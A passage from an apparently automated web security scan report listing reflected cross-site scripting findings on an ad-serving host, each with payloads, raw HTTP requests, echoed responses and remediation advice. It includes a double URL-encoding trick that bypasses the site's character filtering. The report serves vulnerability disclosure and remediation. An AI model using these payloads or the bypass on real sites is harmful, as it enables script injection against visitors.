The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28 was submitted in the REST URL parameter 2. This input was echoed as fab6b";alert(1)//4025c98bb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b";alert(1)//4025c98bb28/1354.0.iframe.200x33/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941 was submitted in the REST URL parameter 2. This input was echoed as 59a15"><script>alert(1)</script>50fd7015941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135759a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135759a15"><script>alert(1)</script>50fd7015941/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec was submitted in the REST URL parameter 3. This input was echoed as 8e66a"><script>alert(1)</script>0f40fdd33ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a"><script>alert(1)</script>0f40fdd33ec/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50920%2522%253balert%25281%2529%252f%252f3c39df87c6c was submitted in the REST URL parameter 3. This input was echoed as 50920";alert(1)//3c39df87c6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920%2522%253balert%25281%2529%252f%252f3c39df87c6c/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920";alert(1)//3c39df87c6c/1290209593**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e20'-alert(1)-'7aac6d5594e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275**;10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
Set-Cookie: i_1=46:1354:798:44:0:32947:1290209720:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.798.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!"
...[SNIP]...

2.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db92e%2522%253balert%25281%2529%252f%252fe91708cc198 was submitted in the REST URL parameter 2. This input was echoed as db92e";alert(1)//e91708cc198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e%2522%253balert%25281%2529%252f%252fe91708cc198/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e";alert(1)//e91708cc198/475.0.iframe.200x33/1290209579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef was submitted in the REST URL parameter 2. This input was echoed as 3b3e5"><script>alert(1)</script>c39f7a1a8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5"><script>alert(1)</script>c39f7a1a8ef/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d was submitted in the REST URL parameter 3. This input was echoed as 67d47"><script>alert(1)</script>2e3f3a3635d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47"><script>alert(1)</script>2e3f3a3635d/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae354%2522%253balert%25281%2529%252f%252f424e1783b9d was submitted in the REST URL parameter 3. This input was echoed as ae354";alert(1)//424e1783b9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354%2522%253balert%25281%2529%252f%252f424e1783b9d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354";alert(1)//424e1783b9d/1290209581**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b84c0"><script>alert(1)</script>a09472ff739 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2362

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f52c"-alert(1)-"37bd5be3146 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2332

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146">
...[SNIP]...

2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dd2"-alert(1)-"7f1a0a0fe72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
